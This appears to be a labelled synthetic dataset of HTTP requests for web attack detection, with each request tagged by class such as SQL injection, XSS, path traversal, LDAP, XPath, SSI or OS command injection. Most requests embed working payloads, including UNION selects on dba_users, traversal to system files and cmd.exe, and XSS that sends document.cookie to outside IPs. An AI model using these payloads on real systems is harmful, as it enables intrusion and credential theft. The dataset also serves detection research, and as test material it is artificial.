Client-ip: 89.18.195.221
Cookie: uooer=..\..\..\..\WINDOWS\system.ini
Date: Tue, 17 Jul 07 15:04:16 GMT
From: Rone@ihnrRe.fr
If-Unmodified-Since: Fri, 11 Dec 09 16:33:12 CET
If-Match: *
If-Range: "@ZPTOMQgG@WrY.1"
Max-Forwards: 31
MIME-Version: 3.2
Pragma: 5hslTioo='dyie'
Proxy-Authorization: ttiWga ek8e=ohYg
Authorization: tyefte teLusaar=ssiwdaft
Referer: http://www.8eninalu.com/mtiv4Sp.pdf
TE: gzip;q=0.3
Trailer: TE
User-Agent: eoti/0.0.0.5.8
UA-OS: Windows NT
UA-Pixels: 8431x403
Via: HTTP/2.0 130.191.131.219, 9.3 28.216.30.64, 9.4 www.leAm.gif
----: ----------------------------------

null

End - Id: 45344
Start - Id: 35384
class: SqlInjection
GET /koIcaeeoehSwl/iuZPn@ECE5xEzu_GFVQi/rN6DV.pl?x8owouieaen=window.opentts%29lrcCev%24ne%7C+d%3CBB&2hmSF=674388&stqnseamroreep=eEtrcmdtBs&TsaegioikEuml=72052852&me6uz=8136582997&boGbeledle4d=yaoeo8mlIne&6rlneiudw3e7T3i=chairs%27+UNION++SELECT+++++sGh7p4+++FROM+++dba_users+++WHERE+++name+++like+++%27%2525&heee0xgGvhsso=uedfegqLjwwwukaxC&uhx=mpLiw&spo8rr5=Syo&ywedfprnsde=h%40ryAW&CshutdownXVPQv=92&west=imtsl%3Beg%7Eiirf&vosrRztahrtai=5304 HTTP/1.0
Host: www.zeeo.org:6834
Connection: 0ntv
Accept: */*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 246.233.58.195
Cookie: ati5steu=xtermmnir;ploEs=08516422;eo=71
Cookie2: $Version="548"
Date: Mon, 15 Mar 10 07:18:19 CET
ETag: W/"1zpGD6YngN8ikJCz7Uio"
Expect: 100-continue
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Fri, 14 Apr 06 16:24:13 CET
If-Unmodified-Since: Wed, 23 Jul 08 13:23:46 GMT
If-Match: "mlnFsp.wgGao_vYR7"
If-None-Match: "nZsX-_rwsF3vYgLqqpXS"
If-Range: Wed, 07 May 08 02:38:29 GMT
Max-Forwards: 88
MIME-Version: 9.2
Pragma: Qbd3hDeU=acrtaxe
Proxy-Authorization: wsul areisdr=nehaa
Authorization: NTLM aWFoanN0aXZlZWdsZXcwbFNnd2dlcnRycG90ZG1oVTJobmRuckVX
Range: 55-,0-,6611-
Referer: /hSqe/in0s/treS.swf
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.6 (Windows; U; WinNT 1.3; ke-no; rv:6.1.1) Gecko/80734021
UA-CPU: Sparc
UA-OS: Windows 95
UA-Pixels: 177x860
Via: 7.5 24.251.102.100, lgps/2.5 240.117.135.68
Transfer-Encoding: compress
Warning: 012 87.127.171.211 "neieAoyzeceydgth" 
X-Forwarded-For: 31.250.119.48
X-Serial-Number: 6475982437005855
----: ----------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 35384
Start - Id: 47595
class: XSS
GET /uoebL5leceawa7r/5Ec4X@wYRSzYJBSUk/seOA3Xwvo/znDte/57tm7t/MCl8ZJ/hsyv/oMhidb5oEp8da/jsdNaR0dtocraietwa/ERNPo9_/uIEh7gowcryl/_phcHpsock_stream.swf?2admin@yqo.acceptH=%26%7B%5Bwindow.open%28%27http%3A%2F%2F124.244.139.25%2Fenling.exe%27%2Bdocument.cookie%29%3B%5D%7D%3B&hrtuedulvrN=%27%3CR%3Dul&RGzL3bmetar=nsforowhrxri&sos6shet=918433901&tUdat=aosqTlhRtterrtm&vbscript5FvSZiGe7=1330657&aooEfssxscsa=32 HTTP/1.1
Host: www.Gpea.ch
Connection: close
Accept: video/*, text/*;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: lallk-adrhhpO
Cache-Control: nt5oo=2MFa8aae
Client-ip: 84.76.139.10
Cookie: ys=ho;P6DMpswget-telnetjsP=|g insert
Cookie2: $Version="1"
Date: Fri, 23 Apr 10 09:39:12 GMT
ETag: "XH4fCPIuXxAhkkU"
Expect: 100-continue
From: pefnsi@neeUgitin6.gov
If-Modified-Since: Sun, 20 Sep 09 14:01:42 GMT
If-Unmodified-Since: Wed, 03 Aug 05 03:45:44 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 411
MIME-Version: 8.3
Pragma: qshtAhwe=etbcne
Proxy-Authorization: Digest qop=m2ta
Authorization: Digest opaque="oy9ooutw"
Range: 849916-
Referer: /mhns.sh
TE: deflate,trailers,chunked
Trailer: TE
User-Agent: nBAOdgbR http://www.guvr.it
UA-CPU: x86
UA-Disp: 672,0345,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 428x2370
Via: 6.6 www.t0ItPd.gif
Transfer-Encoding: compress
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 373 www.dtPeNLcw.css "mneticNase4" 
X-Forwarded-For: 28.174.36.198
X-Serial-Number: 2524902769036083814
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47595
Start - Id: 44873
class: PathTransversal
GET /fform/i6sienlpteiYezea/hhz9m8A@ac/ixfESaoV.zZy/aXs_Nu/8nKFGOoewwhgdLuIi/naynktriSmt4/evae3ss4hie1/tz/Tex6mIl.mspx?nxst2d8t7jner=%252e%252e.%5C%25252f%2F%5C%25252f%2F...%5C%25252e..%252e&oietATt0noue=nie+&addcJet0v=%5Ddsow&eHs=2tns+&nacrhirrob=795538&odbtdrho5=900366&mtEnydeiv=U1&eanypknno=433&oaepFevcA=16&4whaeeitus=tSqyaiWn2%401&_KyEZEl=ltasmzietvnnRotf&feH8M-=eoob&t7O@e=r4ii&eetIe=indh%24evalDn HTTP/1.0
Host: 96.186.75.77
Connection: eOar
Accept: */*;q=0.3
Accept-Charset: x-mac-cyrillic;q=0.4, macintosh, iso-8859-9
Accept-Encoding: deflate;q=0.1
Accept-Language: *;q=0.8
Cache-Control: max-age=04169
Client-ip: 32.25.74.7
Cookie: 55ctskeyg=djgn
Cookie2: $Version="6"
Date: Sat, 14 Jun 08 19:16:31 GMT
ETag: W/"SiR1OdHfUTSXXNI"
Expect: ritRee
From: crrs@n6en.net
If-Modified-Since: Fri, 15 Jan 10 15:58:51 GMT
If-Unmodified-Since: Thu, 30 Aug 07 14:33:50 CET
If-Match: "hhXVUC27SjvpY_@Q5"
If-None-Match: *
If-Range: *
Max-Forwards: 2139
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM bmhJZUFldG5uY2FVdGVFdXNlU1Zpb1llcUZ0bWRkQ0F0YWVlZml5Z2Vv
Authorization: NTLM eW9lYXR0VjRpbTNpazJ1MHN0d2VpaHV5NXR3dWVkYmFjdXB0Z3NiZGdIZ20=
Range: -41,56231-,-8575
Referer: /e9upnU.tar
TE: gzip,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/9.3 (Machintosh; U; PPC 7.7; tm-l3; rv:5.9.2) Gecko/89442351
UA-CPU: PowerPC
UA-Disp: 229,303,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 458x842
Via: 5.8 www.raoYe.jpeg, HTTP/5.7 74.144.123.44, 3.0 www.dItnuqws.png
Transfer-Encoding: gzip
Upgrade: taswen/8.6, 6o7td/4.7, soc/6.3
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 279429
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44873
Start - Id: 46181
class: PathTransversal
GET /1creg/5ebrstevi/edazeA9p/ntrtsekemlslsreclc/Mprocessing-instruction/5ne5hwmisg/r-kO-BS1YwC/eB/hae/yggDQB.jpg?ueieTeN3bwl1n=me-sfzG%25N&oyo=%27etg7sLmRolmrc3&OAc=iXD7fM&9JVbodyTNsjUorm=meehptosTlOr&esreWsstltmua=1teetcIdkofro2is&bc=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&aeb5gas=84&pei0ahfS=552498695&_89BaZSK=vse%3CbeTEOll&es=%286%5Bet%26t HTTP/1.1
Host: www.pxihoI.biz
Connection: a1yr40bi
Accept: audio/*, audio/x-wav;q=0.9, text/plain
Accept-Charset: *
Accept-Encoding: *
Accept-Language: sstot8-tgreu, iaBtse-iyd9lil
Cache-Control: no-cache
Client-ip: 68.94.47.234
Cookie: lrfhsueeonsecbi=35;pea3esOf=31068;wb@YFossd=1slstdinmnddda;t2aehdl=10729279;4deuFEB=e;ar3
Cookie2: $Version="82"
Date: Wed, 25 Apr 07 17:03:10 UTC
ETag: W/"zHp6z1-Anyy.MLyB2IMg"
Expect: cedee3w=dlwMc;pae5ufla=teioH
From: duvqw@ecyw.st
If-Modified-Since: Thu, 14 Dec 06 06:48:11 GMT
If-Unmodified-Since: Sat, 11 Jul 09 14:39:38 CET
If-Match: *
If-None-Match: "h@BfGwMRw8PxrRQhut"
If-Range: Mon, 02 Mar 09 02:41:46 CET
Max-Forwards: 196
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: 9esi xlsrt=e623
Authorization: Digest response="a9e5F10D9dffdBcbdAD1c7071a9ff3dA"
Range: -423
Referer: http://www.iewe.net/ea4mt/Ridhaysj/jai4r/gtnsc/cnhe3es.sh
TE: gzip,chunked,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.4 (compatible; MSIE 3.2; Linux i586; hvtts)
UA-CPU: x86
UA-Disp: 3301,4753,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: 6.5 185.106.63.180
Transfer-Encoding: identity
Upgrade: amiap/9.1
Warning: 292 www.tdsirTm.jpg "oohoctsorndn" "Tue, 29 Dec 09 06:05:50 GMT"
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 726425305540692
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 46181
Start - Id: 47116
class: XSS
GET /ryZSHEoNMnZKN.D/auRr9_p/teou/9ein/lf9poeomreo0oth3eww/8vh9hlfp9xb/uar/eT5eMfi.tiff?Tnn8iere1E=sRk&ZakSIhfh=ndD7mBWxyLzut&8ZformDhome-O-3vF=cNCuof&ckeaeiNawfu=69232537&hode9mimbtuab=03750&ArpNGHRtRh=I4e&Ya40T=30&dtiddJ=s0Py0qYR7NJ&lydiet=d+++style%3Dleft%3Aexpression%28alert+%28ape.ikyyt%29%29 HTTP/1.0
Host: www.t6Nhm0nba.fr
Connection: fjun
Accept: application/*
Accept-Charset: koi8-r;q=0.9
Accept-Encoding: *
Accept-Language: nbeIg9-rghe1x, isegzjh-7;q=0.5, qe6ot-hUpc2prO;q=0.4
Cache-Control: max-stale
Client-ip: 223.238.139.168
Cookie: CmRcUhtaccesTnYIB=t;3eSbRtsrReas=7XVqfk7
Cookie2: $Version="0"
Date: Thu, 27 Jan 05 16:53:13 GMT
ETag: W/"2w0lEfvBfkDGQbZ22V20"
Expect: eeOu
From: Srtniim@ss0iltolEd.ch
If-Modified-Since: Fri, 07 Jul 06 06:14:28 CET
If-Unmodified-Since: Sat, 08 Apr 06 12:50:01 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 080
MIME-Version: 7.3
Pragma: 8=B
Proxy-Authorization: Digest qop=auth
Authorization: NTLM cnNzZ2Vhc3RxbnNlN3JwVWZ2YTl3bm50dHNjY3BzZXJud2U1MHh0bQ==
Range: 38-13,-4
Referer: http://eoOmna.net/tettas.aspx
TE: gzip,trailers
Trailer: Proxy-Authorization
User-Agent: mangEtesic1Obadstci
UA-CPU: 68000
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7372x166
Via: HTTP/0.9 146.105.44.113:2791
Transfer-Encoding: identity
Upgrade: pen/9.1, ccf/6.5
Warning: 086 126.99.38.140:0 "cofaxltfcL1" "Mon, 16 Jan 06 15:09:10 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 2379709487507553302
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47116
Start - Id: 37579
class: LdapInjection
POST /aFwPVexlL02Km/sMa5wErjdClT71_/t0F/tyeikhtewaiijc/basetOles0eftuue/SAtdishpeo/abDm/8F-aO/lVCXqUa@vuBMTK/acsa7hqn3ewaE/x7x72zNICrURi/me6.aspx? HTTP/1.0
Content-Length: 186
Content-Language: oa,ow,ndhisiso
Content-Encoding: gzip
Content-Location: /ceEs/lieea/onritgtP/rntq7.png
Content-MD5: RnJUclQ1ZThzdm5uZWVzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 10 Jun 09 06:24:58 GMT
Last-Modified: Thu, 24 Apr 08 03:40:27 UTC
Host: www.wrlr.biz:80
Connection: keep-alive
Accept: application/*
Accept-Charset: koi8, iso-8859-9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=21357
Client-ip: 234.104.82.80
Cookie: eeeouRzLjoRsisx=oa$qtp$;8sanestes=EotaacepDt;tatopdyei=e]ohtpassh p0ltpe+eie&xi
Cookie2: $Version="2"
Date: Sun, 26 Jun 05 08:10:45 GMT
ETag: W/"A92uOn1wRLAjIgH"
Expect: 100-continue
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Sat, 26 Jan 08 20:44:44 UTC
If-Unmodified-Since: Wed, 30 Jul 08 07:50:37 UTC
If-Match: *
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: *
Max-Forwards: 153
MIME-Version: 1.8
Pragma: ePnze=eh
Proxy-Authorization: NTLM aTZvdWFhYXRpUjU2T2xTZW9lbnRudHdsbm9YbjRlbnJuYg==
Authorization: NTLM UnJueW5CZWhpemhwYWJzTmZjaDNvZWx5eXNyaGlocmVhdHRsZXRvY2NhZHRrcm8=
Range: 36-,-7
Referer: http://cmr0o.gov/orpOg/limM/o7alcbe/1irs/aaiTstn.txt
TE: trailers,deflate,chunked;q=0.7
Trailer: If-None-Match
User-Agent: lnrik (nG7NG3; p46cSCSEn3; eImz48h)
UA-CPU: Sparc
UA-Disp: 1243,740,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4454x553
Via: FTP/0.8 www.5c0ma5fq.gif:70
Transfer-Encoding: deflate
Upgrade: artg/9.7, Boy/7.1, oiE/0.1, mladno/7.3, Ni9/4.6
Warning: 891 www.Senj6a.tiff "aiMu" "Wed, 07 Jun 06 17:57:47 CET"
X-Forwarded-For: 111.32.250.246
X-Serial-Number: 35518631146538
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rrhapynk=htr&xhnFhyonsjaitLn=ayu&iwi=)   ( |(displayName=had*) (name   =had*  )(mail=had*    )&EvReks=Sde&heuephnos9=54473&jO_dfrom8MEexec=ao|stn&hs=fZnahnetlxs

End - Id: 37579
Start - Id: 40520
class: SSI
GET /mantrdrenur/nPieeuoced4dRisd/aGtVXlsQe15P8/dnGmI9/tfnnnrsdi/asnndhtnrnsaa/ifromObw.nsf?hrae=m&cieqxdalpi=1%3B%3Aa&uetDtul3e=%3C%21--++%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22--%3E HTTP/1.1
Host: 11.122.252.12
Connection: close
Accept: */*
Accept-Charset: iso-2022-kr;q=0.4, euc-jp, x-mac-ce, iso-8859-1, gb2312;q=0.8
Accept-Encoding: deflate, gzip;q=0.3, compress, identity;q=0.9
Accept-Language: w0y-reeeh;q=0.4, nrkoGrec-fwedn;q=0.8, aL9s-Elimtia, rtn-ygg
Cache-Control: max-stale
Client-ip: 66.144.251.40
Cookie: adusc=75263;4rurao=tNhtieg;5@.OeHv=tshpb;QiFKKSreplacedD=)
Cookie2: $Version="480"
Date: Tue, 12 Aug 08 24:24:07 GMT
ETag: "Yft_HrePKZX4dLYlSUA"
Expect: 100-continue
From: saz62@4ozorobWl.com
If-Modified-Since: Sat, 04 Nov 06 15:33:36 GMT
If-Unmodified-Since: Sat, 06 Aug 05 12:36:23 GMT
If-Match: *
If-None-Match: "5XAgYq1LduxiU44630"
If-Range: *
Max-Forwards: 350
MIME-Version: 8.6
Pragma: s='ioee'
Proxy-Authorization: dler dcyii=syes
Authorization: Basic aGhhMTplaHpo
Range: 0895-83944,521-,-11650
Referer: /wreohhfT.tiff
TE: trailers,gzip,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/2.7 (compatible; MSIE 1.6; Open BSD i586; Nhea; AninhareF)
UA-CPU: MIPS
UA-Disp: 591,998,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 278x2627
Via: HTTP/2.0 www.oru4eTEt.gif, 5.4 153.14.158.205, 8.5 www.ce2i.gif
Transfer-Encoding: puverY
Upgrade: erf2/5.5, agh/2.9, dtoitg/7.9
Warning: 007 www.sxbtsry.tiff "xpuumjunm3qNdasewfht" "Thu, 02 Jun 05 10:26:48 UTC"
X-Forwarded-For: 74.209.53.98
X-Serial-Number: 4796093744
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40520
Start - Id: 43794
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: www.nteUrg.com:1665
Connection: close
Accept: text/*;q=0.9, video/*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: max-age=3
Client-ip: 50.135.195.138
Cookie: Fc=deoaiInInen;id0eedc9ltn73r=0999;erArrg=ady|4h iEe<Eiam te;rbe=aniDi9asqebws;esn9OpmrateuOt=4;eenoAu=86905
Cookie2: $Version="4"
Date: Sat, 29 Jul 06 19:40:08 UTC
ETag: W/"4KSEhJLGbnGFZx@@ZY"
Expect: 100-continue
From: qto7read@r8owxth.de
If-Modified-Since: Fri, 26 Jun 09 02:26:36 UTC
If-Unmodified-Since: Sat, 30 May 09 06:14:35 CET
If-Match: "lMhgnHGdOr8gJezEp5s"
If-None-Match: "NLC1kQ4611zfCMdym"
If-Range: Thu, 28 Apr 05 19:22:49 CET
Max-Forwards: 9835
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="h4nye"
Authorization: Digest realm
Range: 904036-,02113-35,44499-
Referer: /anlwdu9/eek3ELn8.bin
TE: chunked,trailers
Trailer: Pragma
User-Agent: iewhn (aVkGoiEevu; zXE8xCm; il3CKFj; dwXwWla)
UA-CPU: Sparc
UA-Disp: 7509,580,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 697x813
Via: HTTP/6.1 www.eeyia4hm.tiff:8
Transfer-Encoding: identity
Upgrade: Vsr3e/6.8
Warning: 815 www.nitmdae.gif "rfe4pvnricgalni" 
X-Forwarded-For: 203.135.237.55
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43794
Start - Id: 48464
class: XPathInjection
GET /9krwL6/Atelnet7ncTtBSTq4aQQ.php4?86svks=8512&p7xriejhsnxnuIe=et%2Fdxp_1G+sL+iform&EdyacerSo=0707&PR1WLahtaccesKbetweenaO=350 HTTP/1.1
Host: 156.219.18.101
Connection: close
Accept: text/plain;q=0.7, application/*, application/*;q=0.6
Accept-Charset: *
Accept-Language: *
Cache-Control: max-age=23
Client-ip: 113.45.28.217
Cookie: aioosineod=ge' or   sr/3aa5to/child::node()[processing-instruction()=8]  or  '9ydkthb'= '
Date: Sat, 23 May 09 05:03:21 GMT
If-None-Match: "0Aq3-KqCQPM2ln5lh"
If-Range: *
Max-Forwards: 0
Pragma: no-cache
Authorization: Basic ZWR4ZjpoZWlyZ2Q=
Range: -769462,-3
Referer: http://www.houJ.st/n1tay.php
TE: trailers,gzip;q=0.8
User-Agent: Mozilla/6.4 (X11; U; Unix 1.9; el-fa; rv:6.4.8) Gecko/50648054
UA-Disp: 5787,577,8
Via: aosa/8.0 www.94robs.jpg:39, 2.9 127.131.166.147
Transfer-Encoding: 9l7ih
Warning: 453 106.126.192.35 "eoatO" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48464
Start - Id: 38178
class: LdapInjection
GET /eqenorwoaihahn/ILhttphxmlaoTopenD--K/iIInAECN-ga2A7/ueiBvmg28tsbxrtyLL/chfsvewesnhir/oDgcTl5x0/tE2R_KgP1w@Z3k5/rvPzKOaqIAM64Lu.Cf/leteeou.jpg?t1phpzcid=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&cnySsoteeEl7eph=sw00tALL.2t0&FU@J=sdiqslenzpgErehat&UoRrtoxat=0%5C%27&dss3e=th%7Ck&gU3i46dcoMtN=%3BuYe-%3Ec+t+locationv7&hks5ratoxe=s0wayqax6L&Aa0G7lQyxml@y=nrnipk1ney6to4l&Ya0sa4=1526116 HTTP/1.0
Host: www.lbcdulNrtN.biz:80
Connection: cuCt
Accept: */*
Accept-Charset: utf-7, euc-jp;q=0.9
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 40.128.48.190
Cookie: Iuvbaewn=/ton62ecfonege];jp4.d=oev8X;gnhnlvmnRdonea=i?xterm
Cookie2: $Version="819"
Date: Tue, 07 Nov 06 14:39:39 GMT
ETag: W/"cvMbx4sfux4.USQJj"
Expect: Lsssd
From: 5n7e@llnrwde3K.st
If-Modified-Since: Sun, 12 Dec 04 08:40:40 GMT
If-Unmodified-Since: Sat, 10 Dec 05 15:27:05 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 04 Feb 08 02:44:20 UTC
Max-Forwards: 7671
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM ZWFjdGNpcHQ3ZGM5U2hjc2Vzc24xdEllRWN0c3VramVIdA==
Authorization: Basic dHNzMmRxZzpuZHJyZWw=
Range: -58269,-622
Referer: http://www.R9t8tf.net/h7snSts/lRco/espOe/esao.js
TE: trailers,chunked
Trailer: Via
User-Agent: uJ3ujJ http://www.Essptiif.org
UA-CPU: PowerPC
UA-Disp: 776,149,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 431x6925
Via: 3.2 www.aRput.tiff
Transfer-Encoding: gzip
Upgrade: nume/0.6, Uma/7.3
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 276586158043
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38178
Start - Id: 37155
class: LdapInjection
GET /RdXlYNk66y.@V/.U3mmiH.swf?.R2scriptZ=etM%29%28%26%28objectClass%3D+++hpde*%29&okcynpoeptkt1cp=5287941&idr=Dt%3Cc1&ieszohgirsaaa=rthjfuw&iorceN32=ob1 HTTP/1.0
Host: 136.134.147.212
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=67
Client-ip: 159.233.41.170
Cookie: WaaeSwOiCtogA9n=otad;iic=tSSzKnjlbQ4X;IEeyiTa2zohyot=+n;5eoaseeh=3974142
Cookie2: $Version="12"
Date: Sat, 02 Sep 06 13:10:53 CET
ETag: W/"tPQ1V2111a4tmCmWTe"
Expect: ltdttsO
From: tshrlW@hlaga0aBB1.de
If-Modified-Since: Sun, 10 Dec 06 23:22:38 GMT
If-Unmodified-Since: Sun, 24 Sep 06 16:01:19 UTC
If-Match: "-tKkT@w0qHYwe4meEZFj"
If-None-Match: "vYThNU@fmW8EKJg"
If-Range: "0tws3ITxulaOK84XSM"
Max-Forwards: 1436
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: Basic RWVxYXBiYjpuZXdsdw==
Range: 183458-,10781-99705
Referer: http://www.5meet.com/cfue/Hejthtge.cgi
TE: trailers
Trailer: Accept-Language
User-Agent: zrei/0.5.3.4.7
UA-CPU: 68000
UA-Disp: 303,353,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: cpt4r/0.8 www.obdsCeu.gif:0, 2.6 www.Rrrtoi.htm, 6.7 www.Dlcn.jpeg
Transfer-Encoding: identity
Upgrade: tritan/6.0, s3Tsn/3.7, IThoi0/4.6
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 203.59.253.98
X-Serial-Number: 130460
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37155
Start - Id: 47736
class: XSS
GET /e@ExXVfJWxpGAGj_lN/mstejtslgho/iiBaeM2lEo/passwddivlinkv/nxN9E90hMJSIlfE5/d8yCsZ.BNCC37HWt2/4QV-j6cxciQ@A/deletemail/KktBCDB0aSl5Zm/g5vIHn5hFsoOAslKp/oFc/hCnDpdeial1ldo.htm?anNoaex4prnW=mei&nedia=%3Ca+++href++%3D%22+about%3A%3Cs%26%2399%3Bript%3E%5Bwindow.open%28%27http%3A%2F%2F250.198.121.50%2Fil.aspx%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E+++%22++++%3E&hrehhd6ebag=o%26-updatey3Sbha&bBeouuxhliia=eL54qox4eVmi&li0sdaeoyl=msiW%40aJ&mlh=42498&ei=orsNwp HTTP/1.0
Host: 101.178.157.71:6001
Connection: Rnara
Accept: application/*, image/*;q=0.6
Accept-Charset: utf-7, x-mac-arabic;q=0.8, x-mac-roman;q=0.8, iso-2022-jp;q=0.0
Accept-Encoding: identity, deflate;q=0.1, compress, compress, deflate;q=0.0
Accept-Language: *;q=0.7
Cache-Control: abac4enA=ns0
Client-ip: 190.127.106.120
Cookie: ewai=opunbhm;oyHrthedI=mn'ialn0emsds1;eYi3=nepOSlQw;cysilMrocgt00=naSTjk
Cookie2: $Version="054"
Date: Sun, 12 Jul 09 22:33:50 UTC
ETag: "5T3Rz7Rc1UrCuOe2gb"
Expect: asn70
From: rlNe@ecetad6.fr
If-Modified-Since: Tue, 27 Apr 10 12:29:21 UTC
If-Unmodified-Since: Fri, 07 Dec 07 08:50:03 GMT
If-Match: *
If-None-Match: "4oVvOlJ6lQkdZ9-"
If-Range: "VA-2U3zaHesYoQssS69"
Max-Forwards: 2
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic bW9hcmE6QWN5c2JlZXM=
Authorization: NTLM bm1lbWV3c2Uwc3Jlbm9uaGVoaW5naWh6dGZwM0xjYVdMdWtjbm9sdGE=
Range: 9-,057-2,501963-763
Referer: http://Szpe.fr/kooiuFt.sh
TE: chunked
Trailer: Date
User-Agent: Mozilla/5.0 (Windows; U; Win 9x 3.8; ei-ti; rv:0.2.7) Gecko/27222699
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0710x100
Via: injy/3.1 www.p1dtr.jpg
Transfer-Encoding: gzip
Upgrade: 1eEw/6.0
Warning: 204 41.21.10.144 "pfgeDet" 
X-Forwarded-For: 147.116.190.16
X-Serial-Number: 08031328367563648957
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47736
Start - Id: 41681
class: SqlInjection
GET /w1yvnPqXe_/etatfesdFeheotTahI/okHQfhd/seEtlsut/oczh8xskfciHW-uFYExx/aosuoryo/fz/nekWflbQunCk2X/oNK/aw4b3e9KAPM/pteteebEftbleqtsR/tMroIr2idIn7slOt.gif?shgEn0o6wvcfeu6=%27++OR+++%27ai6edpabo%27+%3D++%27++ HTTP/1.1
Host: www.C3asle.org
Connection: close
Accept: video/*;q=0.9, video/quicktime
Accept-Charset: macintosh;q=0.2, cp-932
Accept-Encoding: gzip, compress;q=0.6, identity;q=0.1, compress;q=0.8, gzip;q=0.6
Accept-Language: rx-glsT, iaei-r;q=0.9, led3ii-AUn, slsu-ttqmr;q=0.8, ulinth-t;q=0.1
Cache-Control: iqts=iay3oa
Client-ip: 106.39.43.168
Cookie: eihren=8639;0j0Ipyh=1522184;23bnp=t-W;8efertr=i7RckUmE.bD
Cookie2: $Version="83"
Date: Mon, 09 May 05 08:05:56 UTC
ETag: W/"4YyPVdLWS5gKL@q03v"
Expect: 100-continue
From: wnytdt@bdcjnzt.org
If-Modified-Since: Tue, 26 Oct 04 17:54:07 GMT
If-Unmodified-Since: Mon, 14 May 07 13:40:47 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 19 Apr 05 24:02:52 GMT
Max-Forwards: 75
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM bGVkbGpuZW1ucXRsb2JnZWJiZWVmVW0ycGVzbWxpaTRWbVNHeQ==
Authorization: Basic emE4ZXQ6Z2V4YmNz
Range: 3550-,-3
Referer: http://51s44mor.cz/krlttjb/tAnojU/iorirdr/wkduaSi/e0tnG.png
TE: deflate,trailers,chunked;q=0.6
Trailer: Max-Forwards
User-Agent: Mozilla/3.2 (Windows; U; WinNT 9.2; eo-gd; rv:4.9.7) Gecko/88391407
UA-CPU: PowerPC
UA-Disp: 1862,8220,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 232x3893
Via: HTTP/9.8 230.23.166.235, FTP/4.4 www.rTd9eze.htm, eurig/4.2 52.151.18.34
Transfer-Encoding: identity
Upgrade: dahek/1.1, htct/7.8, rrepda/5.7, eos/3.6, uoe/1.9
Warning: 118 2.156.64.121 "naglietszhgs" 
X-Forwarded-For: 39.208.247.75
X-Serial-Number: 611965021882313
----: -----------------------------------------
